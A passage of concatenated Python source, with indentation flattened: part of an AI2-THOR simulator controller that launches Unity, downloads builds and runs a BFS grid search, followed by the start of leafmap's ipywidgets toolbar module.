if o['visible']:
visible_objects.append(o['objectId'])
if o['openable']:
if o['isopen']:
add_command(command_counter, 'CloseObject', objectId=o['objectId'])
else:
add_command(command_counter, 'OpenObject', objectId=o['objectId'])
if len(event.metadata['inventoryObjects']) > 0:
if o['receptacle'] and (not o['openable'] or o['isopen']):
inventoryObjectId = event.metadata['inventoryObjects'][0]['objectId']
add_command(command_counter, 'PutObject', objectId=inventoryObjectId, receptacleObjectId=o['objectId'])
elif o['pickupable']:
add_command(command_counter, 'PickupObject', objectId=o['objectId'])
self._interact_commands = default_interact_commands.copy()
self._interact_commands.update(new_commands)
print(command_message)
print("Visible Objects:\n" + "\n".join(sorted(visible_objects)))
skip_keys = ['action', 'objectId']
for k in sorted(new_commands.keys()):
v = new_commands[k]
command_info = [k + ")", v['action']]
if 'objectId' in v:
command_info.append(v['objectId'])
for a, av in v.items():
if a in skip_keys:
continue
command_info.append("%s: %s" % (a, av))
print(' '.join(command_info))
def step(self, action, raise_for_failure=False):
# prevent changes to the action from leaking
action = copy.deepcopy(action)
# XXX should be able to get rid of this with some sort of deprecation warning
if 'AI2THOR_VISIBILITY_DISTANCE' in os.environ:
action['visibilityDistance'] = float(os.environ['AI2THOR_VISIBILITY_DISTANCE'])
should_fail = False
self.last_action = action
if ('objectId' in action and (action['action'] == 'OpenObject' or action['action'] == 'CloseObject')):
force_visible = action.get('forceVisible', False)
if not force_visible and self.last_event.instance_detections2D and action['objectId'] not in self.last_event.instance_detections2D:
should_fail = True
obj_metadata = self.last_event.get_object(action['objectId'])
if obj_metadata is None or obj_metadata['isopen'] == (action['action'] == 'OpenObject'):
should_fail = True
elif action['action'] == 'PutObject':
receptacle_type = action['receptacleObjectId'].split('|')[0]
object_type = action['objectId'].split('|')[0]
if object_type not in RECEPTACLE_OBJECTS[receptacle_type]:
should_fail = True
rotation = action.get('rotation')
if rotation is not None and type(rotation) != dict:
action['rotation'] = {}
action['rotation']['y'] = rotation
if should_fail:
new_event = copy.deepcopy(self.last_event)
new_event.metadata['lastActionSuccess'] = False
self.last_event = new_event
return new_event
assert self.request_queue.empty()
self.response_queue.put_nowait(action)
self.last_event = queue_get(self.request_queue)
if not self.last_event.metadata['lastActionSuccess'] and self.last_event.metadata['errorCode'] == 'InvalidAction':
raise ValueError(self.last_event.metadata['errorMessage'])
if raise_for_failure:
assert self.last_event.metadata['lastActionSuccess']
return self.last_event
def unity_command(self, width, height):
command = self.executable_path()
fullscreen = 1 if self.fullscreen else 0
command += " -screen-fullscreen %s -screen-quality %s -screen-width %s -screen-height %s" % (fullscreen, QUALITY_SETTINGS[self.quality], width, height)
return shlex.split(command)
def _start_unity_thread(self, env, width, height, host, port, image_name):
# get environment variables
env['AI2THOR_CLIENT_TOKEN'] = self.server.client_token = str(uuid.uuid4())
env['AI2THOR_HOST'] = host
env['AI2THOR_PORT'] = str(port)
# env['AI2THOR_SERVER_SIDE_SCREENSHOT'] = 'True'
# print("Viewer: http://%s:%s/viewer" % (host, port))
command = self.unity_command(width, height)
if image_name is not None:
self.container_id = ai2thor.docker.run(image_name, self.base_dir(), ' '.join(command), env)
atexit.register(lambda: ai2thor.docker.kill_container(self.container_id))
else:
proc = subprocess.Popen(command, env=env)
self.unity_pid = proc.pid
atexit.register(lambda: proc.poll() is None and proc.kill())
returncode = proc.wait()
if returncode != 0 and not self.killing_unity:
raise Exception("command: %s exited with %s" % (command, returncode))
def check_docker(self):
if self.docker_enabled:
assert ai2thor.docker.has_docker(), "Docker enabled, but could not find docker binary in path"
assert ai2thor.docker.nvidia_version() is not None,\
"No nvidia driver version found at /proc/driver/nvidia/version - Dockerized THOR is only \
compatible with hosts with Nvidia cards with a driver installed"
def check_x_display(self, x_display):
with open(os.devnull, "w") as dn:
# copying the environment so that we pick up
# XAUTHORITY values
env = os.environ.copy()
env['DISPLAY'] = x_display
if subprocess.call(['which', 'xdpyinfo'], stdout=dn) == 0:
assert subprocess.call("xdpyinfo", stdout=dn, env=env, shell=True) == 0, \
("Invalid DISPLAY %s - cannot find X server with xdpyinfo" % x_display)
def _start_server_thread(self):
self.server.start()
def releases_dir(self):
return os.path.join(self.base_dir(), 'releases')
def base_dir(self):
return os.path.join(os.path.expanduser('~'), '.ai2thor')
def build_name(self):
return os.path.splitext(os.path.basename(BUILDS[platform.system()]['url']))[0]
def executable_path(self):
if self.local_executable_path is not None:
return self.local_executable_path
target_arch = platform.system()
if target_arch == 'Linux':
return os.path.join(self.releases_dir(), self.build_name(), self.build_name())
elif target_arch == 'Darwin':
return os.path.join(
self.releases_dir(),
self.build_name(),
self.build_name() + ".app",
"Contents/MacOS",
self.build_name())
else:
raise Exception('unable to handle target arch %s' % target_arch)
def download_binary(self):
if platform.architecture()[0] != '64bit':
raise Exception("Only 64bit currently supported")
url = BUILDS[platform.system()]['url']
tmp_dir = os.path.join(self.base_dir(), 'tmp')
makedirs(self.releases_dir())
makedirs(tmp_dir)
if not os.path.isfile(self.executable_path()):
zip_data = ai2thor.downloader.download(
url,
self.build_name(),
BUILDS[platform.system()]['sha256'])
z = zipfile.ZipFile(io.BytesIO(zip_data))
# use tmp_dir instead of a random number
extract_dir = os.path.join(tmp_dir, self.build_name())
logger.debug("Extracting zipfile %s" % os.path.basename(url))
z.extractall(extract_dir)
os.rename(extract_dir, os.path.join(self.releases_dir(), self.build_name()))
# we can lose the executable permission when unzipping a build
os.chmod(self.executable_path(), 0o755)
else:
logger.debug("%s exists - skipping download" % self.executable_path())
def start(
self,
port=0,
start_unity=True,
player_screen_width=300,
player_screen_height=300,
x_display=None):
if 'AI2THOR_VISIBILITY_DISTANCE' in os.environ:
import warnings
warnings.warn("AI2THOR_VISIBILITY_DISTANCE environment variable is deprecated, use \
the visibilityDistance parameter with the Initialize action instead")
if player_screen_height < 300 or player_screen_width < 300:
raise Exception("Screen resolution must be >= 300x300")
if self.server_thread is not None:
raise Exception("server has already been started - cannot start more than once")
env = os.environ.copy()
image_name = None
host = '127.0.0.1'
if self.docker_enabled:
self.check_docker()
host = ai2thor.docker.bridge_gateway()
self.server = ai2thor.server.Server(
self.request_queue,
self.response_queue,
host,
port=port)
_, port = self.server.wsgi_server.socket.getsockname()
self.server_thread = threading.Thread(target=self._start_server_thread)
self.server_thread.daemon = True
self.server_thread.start()
if start_unity:
if platform.system() == 'Linux':
if self.docker_enabled:
image_name = ai2thor.docker.build_image()
else:
if x_display:
env['DISPLAY'] = ':' + x_display
elif 'DISPLAY' not in env:
env['DISPLAY'] = ':0.0'
self.check_x_display(env['DISPLAY'])
self.download_binary()
self.lock_release()
self.prune_releases()
unity_thread = threading.Thread(
target=self._start_unity_thread,
args=(env, player_screen_width, player_screen_height, host, port, image_name))
unity_thread.daemon = True
unity_thread.start()
# receive the first request
self.last_event = queue_get(self.request_queue)
return self.last_event
def stop(self):
self.response_queue.put_nowait({})
self.server.wsgi_server.shutdown()
self.stop_container()
self.stop_unity()
self.unlock_release()
def stop_container(self):
if self.container_id:
ai2thor.docker.kill_container(self.container_id)
self.container_id = None
def stop_unity(self):
if self.unity_pid and process_alive(self.unity_pid):
self.killing_unity = True
os.kill(self.unity_pid, signal.SIGTERM)
for i in range(10):
if not process_alive(self.unity_pid):
break
time.sleep(0.1)
if process_alive(self.unity_pid):
os.kill(self.unity_pid, signal.SIGKILL)
class BFSSearchPoint:
def __init__(self, start_position, move_vector, heading_angle=0.0, horizon_angle=0.0):
self.start_position = start_position
self.move_vector = defaultdict(lambda: 0.0)
self.move_vector.update(move_vector)
self.heading_angle = heading_angle
self.horizon_angle = horizon_angle
def target_point(self):
x = self.start_position['x'] + self.move_vector['x']
z = self.start_position['z'] + self.move_vector['z']
return dict(x=x, z=z)
class BFSController(Controller):
def __init__(self, grid_size=0.25):
super(BFSController, self).__init__()
self.rotations = [0, 90, 180, 270]
self.horizons = [330, 0, 30]
self.allow_enqueue = True
self.queue = deque()
self.seen_points = []
self.visited_seen_points = []
self.grid_points = []
self.grid_size = grid_size
self._check_visited = False
self.distance_threshold = self.grid_size / 5.0
def visualize_points(self, scene_name, wait_key=10):
import cv2
points = set()
xs = []
zs = []
# collect the x/z coordinates of every known grid point
for point in self.grid_points:
xs.append(point['x'])
zs.append(point['z'])
points.add(str(point['x']) + "," + str(point['z']))
image_width = 470
image_height = 530
image = np.zeros((image_height, image_width, 3), np.uint8)
if not xs:
return
min_x = min(xs) - 1
max_x = max(xs) + 1
min_z = min(zs) - 1
max_z = max(zs) + 1
for point in list(points):
x, z = map(float, point.split(','))
circle_x = round(((x - min_x) / float(max_x - min_x)) * image_width)
z = (max_z - z) + min_z
circle_y = round(((z - min_z) / float(max_z - min_z)) * image_height)
cv2.circle(image, (circle_x, circle_y), 5, (0, 255, 0), -1)
cv2.imshow(scene_name, image)
cv2.waitKey(wait_key)
def has_islands(self):
queue = []
seen_points = set()
mag = self.grid_size
def enqueue_island_points(p):
if json.dumps(p) in seen_points:
return
queue.append(dict(z=p['z'] + mag, x=p['x']))
queue.append(dict(z=p['z'] - mag, x=p['x']))
queue.append(dict(z=p['z'], x=p['x'] + mag))
queue.append(dict(z=p['z'], x=p['x'] - mag))
seen_points.add(json.dumps(p))
enqueue_island_points(self.grid_points[0])
while queue:
point_to_find = queue.pop()
for p in self.grid_points:
dist = math.sqrt(
((point_to_find['x'] - p['x']) ** 2) +
((point_to_find['z'] - p['z']) ** 2))
if dist < 0.05:
enqueue_island_points(p)
return len(seen_points) != len(self.grid_points)
def build_graph(self):
import networkx as nx
graph = nx.Graph()
for point in self.grid_points:
self._build_graph_point(graph, point)
return graph
def key_for_point(self, point):
return "{x:0.3f}|{z:0.3f}".format(**point)
def _build_graph_point(self, graph, point):
for p in self.grid_points:
dist = math.sqrt(((point['x'] - p['x']) ** 2) + ((point['z'] - p['z']) ** 2))
if dist <= (self.grid_size + 0.01) and dist > 0:
graph.add_edge(self.key_for_point(point), self.key_for_point(p))
def move_relative_points(self, all_points, graph, position, rotation):
action_orientation = {
0:dict(x=0, z=1, action='MoveAhead'),
90:dict(x=1, z=0, action='MoveRight'),
180:dict(x=0, z=-1, action='MoveBack'),
270:dict(x=-1, z=0, action='MoveLeft')
}
move_points = dict()
for n in graph.neighbors(self.key_for_point(position)):
point = all_points[n]
x_o = round((point['x'] - position['x']) / self.grid_size)
z_o = round((point['z'] - position['z']) / self.grid_size)
for target_rotation, offsets in action_orientation.items():
delta = round(rotation + target_rotation) % 360
ao = action_orientation[delta]
action_name = action_orientation[target_rotation]['action']
if x_o == ao['x'] and z_o == ao['z']:
move_points[action_name] = point
break
return move_points
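# worked example (illustrative): with the agent at rotation 90 (facing +x), a
# neighboring grid point one cell away in +x is returned under 'MoveAhead',
# while a neighbor one cell away in +z maps to 'MoveLeft'.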
def plan_horizons(self, agent_horizon, target_horizon):
actions = []
horizon_step_map = {330:3, 0:2, 30:1, 60:0}
look_diff = horizon_step_map[int(agent_horizon)] - horizon_step_map[int(target_horizon)]
if look_diff > 0:
for i in range(look_diff):
actions.append(dict(action='LookDown'))
else:
for i in range(abs(look_diff)):
actions.append(dict(action='LookUp'))
return actions
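# worked example (illustrative): horizon_step_map treats 330 as the highest
# camera angle and 60 as the lowest, so
#   plan_horizons(330, 30)  ->  [LookDown, LookDown]   (3 - 1 = 2 steps down)
#   plan_horizons(30, 0)    ->  [LookUp]               (1 - 2 = -1, one step up)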
def plan_rotations(self, agent_rotation, target_rotation):
right_diff = target_rotation - agent_rotation
if right_diff < 0:
right_diff += 360
right_steps = right_diff / 90
left_diff = agent_rotation - target_rotation
if left_diff < 0:
left_diff += 360
left_steps = left_diff / 90
actions = []
if right_steps < left_steps:
for i in range(int(right_steps)):
actions.append(dict(action='RotateRight'))
else:
for i in range(int(left_steps)):
actions.append(dict(action='RotateLeft'))
return actions
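# worked example (illustrative): the shorter spin direction always wins,
# with ties going to the left:
#   plan_rotations(270, 0)   ->  [RotateRight]              (90 right vs 270 left)
#   plan_rotations(0, 180)   ->  [RotateLeft, RotateLeft]   (180 either way)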
def shortest_plan(self, graph, agent, target):
import networkx as nx
path = nx.shortest_path(graph, self.key_for_point(agent['position']), self.key_for_point(target['position']))
actions = []
all_points = {}
for point in self.grid_points:
all_points[self.key_for_point(point)] = point
#assert all_points[path[0]] == agent['position']
current_position = agent['position']
current_rotation = agent['rotation']['y']
for p in path[1:]:
inv_pms = {self.key_for_point(v): k for k, v in self.move_relative_points(all_points, graph, current_position, current_rotation).items()}
actions.append(dict(action=inv_pms[p]))
current_position = all_points[p]
actions += self.plan_horizons(agent['cameraHorizon'], target['cameraHorizon'])
actions += self.plan_rotations(agent['rotation']['y'], target['rotation']['y'])
# self.visualize_points(path)
return actions
def enqueue_point(self, point):
# ensure there are no points near the new point
if self._check_visited or not any(map(lambda p: distance(p, point.target_point()) < self.distance_threshold, self.seen_points)):
self.seen_points.append(point.target_point())
self.queue.append(point)
def enqueue_points(self, agent_position):
if not self.allow_enqueue:
return
if not self._check_visited or not any(map(lambda p: distance(p, agent_position) < self.distance_threshold, self.visited_seen_points)):
self.enqueue_point(BFSSearchPoint(agent_position, dict(x=-1 * self.grid_size)))
self.enqueue_point(BFSSearchPoint(agent_position, dict(x=self.grid_size)))
self.enqueue_point(BFSSearchPoint(agent_position, dict(z=-1 * self.grid_size)))
self.enqueue_point(BFSSearchPoint(agent_position, dict(z=1 * self.grid_size)))
self.visited_seen_points.append(agent_position)
def search_all_closed(self, scene_name):
self.allow_enqueue = True
self.queue = deque()
self.seen_points = []
self.visited_seen_points = []
self.grid_points = []
event = self.reset(scene_name)
event = self.step(dict(action='Initialize', gridSize=self.grid_size))
self.enqueue_points(event.metadata['agent']['position'])
while self.queue:
self.queue_step()
# self.visualize_points(scene_name)
def start_search(
self,
scene_name,
random_seed,
full_grid,
current_receptacle_object_pairs,
randomize=True):
self.seen_points = []
self.visited_seen_points = []
self.queue = deque()
self.grid_points = []
# we only search a pre-defined grid with all the cabinets/fridges closed
# then keep the points that can still be reached
self.allow_enqueue = True
for gp in full_grid:
self.enqueue_points(gp)
self.allow_enqueue = False
self.reset(scene_name)
receptacle_object_pairs = []
for op in current_receptacle_object_pairs:
object_id, receptacle_object_id = op.split('||')
receptacle_object_pairs.append(
dict(receptacleObjectId=receptacle_object_id,
objectId=object_id))
if randomize:
self.random_initialize(
random_seed=random_seed,
unique_object_types=True,
exclude_receptacle_object_pairs=receptacle_object_pairs)
# there is some randomization in initialize scene
# and if a seed is passed in this will keep it
# deterministic
if random_seed is not None:
random.seed(random_seed)
self.initialize_scene()
while self.queue:
self.queue_step()
#self.visualize_points(scene_name)
self.prune_points()
#self.visualize_points(scene_name)
# get rid of unreachable points
def prune_points(self):
final_grid_points = set()
for gp in self.grid_points:
final_grid_points.add(key_for_point(gp['x'], gp['z']))
pruned_grid_points = []
for gp in self.grid_points:
found = False
for x in [1, -1]:
found |= key_for_point(gp['x'] + (self.grid_size * x), gp['z']) in final_grid_points
for z in [1, -1]:
found |= key_for_point(
gp['x'],
(self.grid_size * z) + gp['z']) in final_grid_points
if found:
pruned_grid_points.append(gp)
self.grid_points = pruned_grid_points
def is_object_visible(self, object_id):
for obj in self.last_event.metadata['objects']:
if obj['objectId'] == object_id and obj['visible']:
return True
return False
def find_visible_receptacles(self):
receptacle_points = []
receptacle_pivot_points = []
# pick up all pickupable objects, remembering one Mug/CellPhone to use later as a visibility probe
visibility_object_id = None
visibility_object_types = ['Mug', 'CellPhone']
for obj in self.last_event.metadata['objects']:
if obj['pickupable']:
self.step(action=dict(
action='PickupObject',
objectId=obj['objectId'],
forceVisible=True))
if visibility_object_id is None and obj['objectType'] in visibility_object_types:
visibility_object_id = obj['objectId']
for point in self.grid_points:
self.step(dict(
action='Teleport',
x=point['x'],
y=point['y'],
z=point['z']), raise_for_failure=True)
for rot, hor in product(self.rotations, self.horizons):
event = self.step(
dict(action='RotateLook', rotation=rot, horizon=hor),
raise_for_failure=True)
for j in event.metadata['objects']:
if j['receptacle'] and j['visible']:
receptacle_points.append(dict(
distance=j['distance'],
pivotId=0,
receptacleObjectId=j['objectId'],
searchNode=dict(
horizon=hor,
rotation=rot,
openReceptacle=False,
pivotId=0,
receptacleObjectId='',
x=point['x'],
y=point['y'],
z=point['z'])))
if j['openable']:
self.step(action=dict(
action='OpenObject',
forceVisible=True,
objectId=j['objectId']),
raise_for_failure=True)
for pivot_id in range(j['receptacleCount']):
self.step(
action=dict(
action='Replace',
forceVisible=True,
receptacleObjectId=j['objectId'],
objectId=visibility_object_id,
pivot=pivot_id), raise_for_failure=True)
if self.is_object_visible(visibility_object_id):
receptacle_pivot_points.append(dict(
distance=j['distance'],
pivotId=pivot_id,
receptacleObjectId=j['objectId'],
searchNode=dict(
horizon=hor,
rotation=rot,
openReceptacle=j['openable'],
pivotId=pivot_id,
receptacleObjectId=j['objectId'],
x=point['x'],
y=point['y'],
z=point['z'])))
if j['openable']:
self.step(action=dict(
action='CloseObject',
forceVisible=True,
objectId=j['objectId']),
raise_for_failure=True)
return receptacle_pivot_points, receptacle_points
def find_visible_objects(self):
seen_target_objects = defaultdict(list)
for point in self.grid_points:
self.step(dict(
action='Teleport',
x=point['x'],
y=point['y'],
z=point['z']), raise_for_failure=True)
for rot, hor in product(self.rotations, self.horizons):
event = self.step(dict(
action='RotateLook',
rotation=rot,
horizon=hor), raise_for_failure=True)
object_receptacle = dict()
for obj in event.metadata['objects']:
if obj['receptacle']:
for pso in obj['pivotSimObjs']:
object_receptacle[pso['objectId']] = obj
for obj in filter(
lambda x: x['visible'] and x['pickupable'],
event.metadata['objects']):
#if obj['objectId'] in object_receptacle and\
# object_receptacle[obj['objectId']]['openable'] and not \
# object_receptacle[obj['objectId']]['isopen']:
# continue
seen_target_objects[obj['objectId']].append(dict(
distance=obj['distance'],
agent=event.metadata['agent']))
return seen_target_objects
def initialize_scene(self):
self.target_objects = []
self.object_receptacle = defaultdict(
lambda: dict(objectId='StartupPosition', pivotSimObjs=[]))
self.open_receptacles = []
open_pickupable = {}
pickupable = {}
is_open = {}
for obj in filter(lambda x: x['receptacle'], self.last_event.metadata['objects']):
for oid in obj['receptacleObjectIds']:
self.object_receptacle[oid] = obj
is_open[obj['objectId']] = (obj['openable'] and obj['isopen'])
for obj in filter(lambda x: x['receptacle'], self.last_event.metadata['objects']):
for oid in obj['receptacleObjectIds']:
if obj['openable'] or (obj['objectId'] in self.object_receptacle and self.object_receptacle[obj['objectId']]['openable']):
open_pickupable[oid] = obj['objectId']
else:
pickupable[oid] = obj['objectId']
if open_pickupable.keys():
self.target_objects = random.sample(list(open_pickupable.keys()), k=1)
shuffled_keys = list(open_pickupable.keys())
random.shuffle(shuffled_keys)
for oid in shuffled_keys:
position_target = self.object_receptacle[self.target_objects[0]]['position']
position_candidate = self.object_receptacle[oid]['position']
dist = math.sqrt(
(position_target['x'] - position_candidate['x']) ** 2 +
(position_target['y'] - position_candidate['y']) ** 2)
# try to find something that is far to avoid having the doors collide
if dist > 1.25:
self.target_objects.append(oid)
break
for roid in set(map(lambda x: open_pickupable[x], self.target_objects)):
if roid in is_open:
continue
self.open_receptacles.append(roid)
self.step(dict(
action='OpenObject',
objectId=roid,
forceVisible=True), raise_for_failure=True)
def queue_step(self):
search_point = self.queue.popleft()
event = self.step(dict(
action='Teleport',
x=search_point.start_position['x'],
y=search_point.start_position['y'],
z=search_point.start_position['z']))
assert event.metadata['lastActionSuccess']
move_vec = search_point.move_vector
move_vec['moveMagnitude'] = self.grid_size
event = self.step(dict(action='Move', **move_vec))
if event.metadata['lastActionSuccess']:
if event.metadata['agent']['position']['y'] > 1.3:
#pprint(search_point.start_position)
#pprint(search_point.move_vector)
#pprint(event.metadata['agent']['position'])
raise Exception("**** got big point ")
self.enqueue_points(event.metadata['agent']['position'])
if not any(map(lambda p: distance(p, event.metadata['agent']['position']) < self.distance_threshold, self.grid_points)):
self.grid_points.append(event.metadata['agent']['position'])
return event
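# Illustrative usage sketch (hypothetical; not part of the original file). It shows
# how the two-pass grid search above is typically driven: search_all_closed() fills
# self.grid_points with every reachable point while receptacles are closed, and
# start_search() reuses that grid after randomization and prunes unreachable points.
# The class name BFSController, the start() call, and the scene name "FloorPlan28"
# are assumptions for illustration only.
def _example_bfs_search_sketch():
    controller = BFSController()  # assumed name of the enclosing controller class
    controller.start()            # assumed: the controller exposes a start() method
    # Pass 1: explore with every openable receptacle closed.
    controller.search_all_closed('FloorPlan28')
    reachable = list(controller.grid_points)
    # Pass 2: reuse that grid as the candidate set and keep only still-reachable points.
    controller.start_search(
        scene_name='FloorPlan28',
        random_seed=0,
        full_grid=reachable,
        current_receptacle_object_pairs=[],
        randomize=True)
    return controller.grid_points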
|
toolbar.py
|
"""Module for dealing with the toolbar.
"""
import math
import os
import ipyevents
import ipyleaflet
import ipywidgets as widgets
from ipyfilechooser import FileChooser
from .common import *
def tool_template(m=None):
"""Generates a tool GUI template using ipywidgets.
Args:
m (leafmap.Map, optional): The leaflet Map object. Defaults to None.
Returns:
ipywidgets: The tool GUI widget.
"""
widget_width = "250px"
padding = "0px 0px 0px 5px" # upper, right, bottom, left
style = {"description_width": "initial"}
toolbar_button = widgets.ToggleButton(
value=False,
tooltip="Toolbar",
icon="gear",
layout=widgets.Layout(width="28px", height="28px", padding="0px 0px 0px 4px"),
)
close_button = widgets.ToggleButton(
value=False,
tooltip="Close the tool",
icon="times",
button_style="primary",
layout=widgets.Layout(height="28px", width="28px", padding="0px 0px 0px 4px"),
)
checkbox = widgets.Checkbox(
description="Checkbox",
indent=False,
layout=widgets.Layout(padding=padding, width=widget_width),
)
dropdown = widgets.Dropdown(
options=["Option 1", "Option 2", "Option 3"],
value=None,
description="Dropdown:",
layout=widgets.Layout(width=widget_width, padding=padding),
style=style,
)
int_slider = widgets.IntSlider(
min=1,
max=100,
description="Int Slider: ",
readout=False,
continuous_update=True,
layout=widgets.Layout(width="220px", padding=padding),
style=style,
)
int_slider_label = widgets.Label()
widgets.jslink((int_slider, "value"), (int_slider_label, "value"))
float_slider = widgets.FloatSlider(
min=1,
max=100,
description="Float Slider: ",
readout=False,
continuous_update=True,
layout=widgets.Layout(width="220px", padding=padding),
style=style,
)
float_slider_label = widgets.Label()
widgets.jslink((float_slider, "value"), (float_slider_label, "value"))
color = widgets.ColorPicker(
concise=False,
description="Color:",
value="white",
style=style,
layout=widgets.Layout(width=widget_width, padding=padding),
)
text = widgets.Text(
value="",
description="Textbox:",
placeholder="Placeholder",
style=style,
layout=widgets.Layout(width=widget_width, padding=padding),
)
textarea = widgets.Textarea(
placeholder="Placeholder",
layout=widgets.Layout(width=widget_width),
)
buttons = widgets.ToggleButtons(
value=None,
options=["Apply", "Reset", "Close"],
tooltips=["Apply", "Reset", "Close"],
button_style="primary",
)
buttons.style.button_width = "80px"
output = widgets.Output(layout=widgets.Layout(width=widget_width, padding=padding))
toolbar_widget = widgets.VBox()
toolbar_widget.children = [toolbar_button]
toolbar_header = widgets.HBox()
toolbar_header.children = [close_button, toolbar_button]
toolbar_footer = widgets.VBox()
toolbar_footer.children = [
checkbox,
widgets.HBox([int_slider, int_slider_label]),
widgets.HBox([float_slider, float_slider_label]),
dropdown,
text,
color,
textarea,
buttons,
output,
]
toolbar_event = ipyevents.Event(
source=toolbar_widget, watched_events=["mouseenter", "mouseleave"]
)
def handle_toolbar_event(event):
if event["type"] == "mouseenter":
toolbar_widget.children = [toolbar_header, toolbar_footer]
elif event["type"] == "mouseleave":
if not toolbar_button.value:
toolbar_widget.children = [toolbar_button]
toolbar_button.value = False
close_button.value = False
toolbar_event.on_dom_event(handle_toolbar_event)
def toolbar_btn_click(change):
if change["new"]:
close_button.value = False
toolbar_widget.children = [toolbar_header, toolbar_footer]
else:
if not close_button.value:
toolbar_widget.children = [toolbar_button]
toolbar_button.observe(toolbar_btn_click, "value")
def close_btn_click(change):
if change["new"]:
toolbar_button.value = False
if m is not None:
m.toolbar_reset()
if m.tool_control is not None and m.tool_control in m.controls:
m.remove_control(m.tool_control)
m.tool_control = None
toolbar_widget.close()
close_button.observe(close_btn_click, "value")
def button_clicked(change):
if change["new"] == "Apply":
with output:
output.clear_output()
print("Running ...")
elif change["new"] == "Reset":
textarea.value = ""
output.clear_output()
elif change["new"] == "Close":
if m is not None:
m.toolbar_reset()
if m.tool_control is not None and m.tool_control in m.controls:
m.remove_control(m.tool_control)
m.tool_control = None
toolbar_widget.close()
buttons.value = None
buttons.observe(button_clicked, "value")
toolbar_button.value = True
if m is not None:
toolbar_control = ipyleaflet.WidgetControl(
widget=toolbar_widget, position="topright"
)
if toolbar_control not in m.controls:
m.add_control(toolbar_control)
m.tool_control = toolbar_control
else:
return toolbar_widget
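# Illustrative usage sketch (hypothetical; assumes a Jupyter environment with leafmap
# importable). tool_template(m) attaches the template toolbar to the map as a top-right
# WidgetControl; calling it without a map returns the bare ipywidgets.VBox instead.
def _example_tool_template_usage():
    import leafmap  # assumed to be importable in the notebook environment

    m = leafmap.Map()
    tool_template(m)              # attaches the toolbar; hover the gear icon to expand it
    standalone = tool_template()  # returns the VBox when no map is supplied
    return m, standalone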
def main_toolbar(m):
"""Creates the main toolbar and adds it to the map.
Args:
m (leafmap.Map): The leafmap Map object.
"""
tools = {
"map": {
"name": "basemap",
"tooltip": "Change basemap",
},
"globe": {
"name": "split_map",
"tooltip": "Split-panel map",
},
"adjust": {
"name": "planet",
"tooltip": "Planet imagery",
},
"folder-open": {
"name": "open_data",
"tooltip": "Open local vector/raster data",
},
"gears": {
"name": "whitebox",
"tooltip": "WhiteboxTools for local geoprocessing",
},
"fast-forward": {
"name": "timeslider",
"tooltip": "Activate the time slider",
},
"eraser": {
"name": "eraser",
"tooltip": "Remove all drawn features",
},
"camera": {
"name": "save_map",
"tooltip": "Save map as HTML or image",
},
"address-book": {
"name": "census",
"tooltip": "Get US Census data",
},
"info": {
"name": "inspector",
"tooltip": "Get COG/STAC pixel value",
},
"search": {
"name": "search_xyz",
"tooltip": "Search XYZ tile services",
},
"download": {
"name": "download_osm",
"tooltip": "Download OSM data",
},
"smile-o": {
"name": "placeholder",
"tooltip": "This is a placeholder",
},
"spinner": {
"name": "placeholder2",
"tooltip": "This is a placeholder",
},
"question": {
"name": "help",
"tooltip": "Get help",
},
}
# if m.sandbox_path is None and (os.environ.get("USE_VOILA") is not None):
# voila_tools = ["camera", "folder-open", "gears"]
# for item in voila_tools:
# if item in tools.keys():
# del tools[item]
icons = list(tools.keys())
tooltips = [item["tooltip"] for item in list(tools.values())]
icon_width = "32px"
icon_height = "32px"
n_cols = 3
n_rows = math.ceil(len(icons) / n_cols)
toolbar_grid = widgets.GridBox(
children=[
widgets.ToggleButton(
layout=widgets.Layout(
width="auto", height="auto", padding="0px 0px 0px 4px"
),
button_style="primary",
icon=icons[i],
tooltip=tooltips[i],
)
for i in range(len(icons))
],
layout=widgets.Layout(
width="109px",
grid_template_columns=(icon_width + " ") * n_cols,
grid_template_rows=(icon_height + " ") * n_rows,
grid_gap="1px 1px",
padding="5px",
),
)
m.toolbar = toolbar_grid
def tool_callback(change):
if change["new"]:
current_tool = change["owner"]
for tool in toolbar_grid.children:
if tool is not current_tool:
tool.value = False
tool = change["owner"]
tool_name = tools[tool.icon]["name"]
if tool_name == "basemap":
change_basemap(m)
if tool_name == "split_map":
split_basemaps(m)
if tool_name == "planet":
split_basemaps(m, layers_dict=planet_tiles())
elif tool_name == "open_data":
open_data_widget(m)
elif tool_name == "eraser":
if m.draw_control is not None:
m.draw_control.clear()
m.user_roi = None
m.user_rois = None
m.draw_features = []
elif tool_name == "whitebox":
import whiteboxgui.whiteboxgui as wbt
tools_dict = wbt.get_wbt_dict()
wbt_toolbox = wbt.build_toolbox(
tools_dict,
max_width="800px",
max_height="500px",
sandbox_path=m.sandbox_path,
)
wbt_control = ipyleaflet.WidgetControl(
widget=wbt_toolbox, position="bottomright"
)
m.whitebox = wbt_control
m.add_control(wbt_control)
elif tool_name == "timeslider":
m.add_time_slider()
elif tool_name == "save_map":
save_map(m)
elif tool_name == "census":
census_widget(m)
elif tool_name == "inspector":
inspector_gui(m)
elif tool_name == "search_xyz":
search_basemaps(m)
elif tool_name == "download_osm":
download_osm(m)
elif tool_name == "help":
import webbrowser
webbrowser.open_new_tab("https://leafmap.org")
current_tool.value = False
else:
# tool = change["owner"]
# tool_name = tools[tool.icon]["name"]
pass
m.toolbar_reset()
for tool in toolbar_grid.children:
tool.observe(tool_callback, "value")
toolbar_button = widgets.ToggleButton(
value=False,
tooltip="Toolbar",
icon="wrench",
layout=widgets.Layout(width="28px", height="28px", padding="0px 0px 0px 4px"),
)
m.toolbar_button = toolbar_button
layers_button = widgets.ToggleButton(
value=False,
tooltip="Layers",
icon="server",
layout=widgets.Layout(height="28px", width="72px"),
)
toolbar_widget = widgets.VBox()
toolbar_widget.children = [toolbar_button]
toolbar_header = widgets.HBox()
toolbar_header.children = [layers_button, toolbar_button]
toolbar_footer = widgets.VBox()
toolbar_footer.children = [toolbar_grid]
toolbar_event = ipyevents.Event(
source=toolbar_widget, watched_events=["mouseenter", "mouseleave"]
)
def handle_toolbar_event(event):
if event["type"] == "mouseenter":
toolbar_widget.children = [toolbar_header, toolbar_footer]
elif event["type"] == "mouseleave":
if not toolbar_button.value:
toolbar_widget.children = [toolbar_button]
toolbar_button.value = False
layers_button.value = False
toolbar_event.on_dom_event(handle_toolbar_event)
def toolbar_btn_click(change):
if change["new"]:
layers_button.value = False
toolbar_widget.children = [toolbar_header, toolbar_footer]
else:
if not layers_button.value:
toolbar_widget.children = [toolbar_button]
toolbar_button.observe(toolbar_btn_click, "value")
def layers_btn_click(change):
if change["new"]:
layers_hbox = []
all_layers_chk = widgets.Checkbox(
value=False,
description="All layers on/off",
indent=False,
